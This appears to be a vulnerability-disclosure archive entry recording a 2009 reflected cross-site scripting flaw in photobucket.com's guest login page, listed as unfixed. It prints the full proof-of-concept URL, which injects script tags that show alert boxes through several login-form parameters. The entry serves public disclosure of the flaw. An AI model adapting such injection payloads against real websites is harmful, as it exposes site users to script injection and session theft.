Security researcher Azat Harutyunyan, has submitted on 26/05/2009 a cross-site-scripting (XSS) vulnerability affecting photobucket.com, which at the time of submission ranked 39 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 27/05/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 26/05/2009 Date published: 27/05/2009 Fixed? Mail us!Status:  UNFIXED
Author: Azat Harutyunyan Domain: photobucket.com Category: XSS Pagerank: 39
URL: http://photobucket.com/guestlogin?loginForm[albumUrl]=http://s289.photobucket.com/albums/ll233/><scr
ipt>alert("xssed by azat")</script>><script>alert("xssed by azat")</script>><script>alert("xssed by
azat")</script>><script>alert("xssed by azat")</script>><script>alert("xssed by
azat")</script>&loginForm[redirectAction]=&loginForm[password]=><script>alert("xssed')</script>&logi
n=><script>alert("xssed")</script>
Click here to view the mirror
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.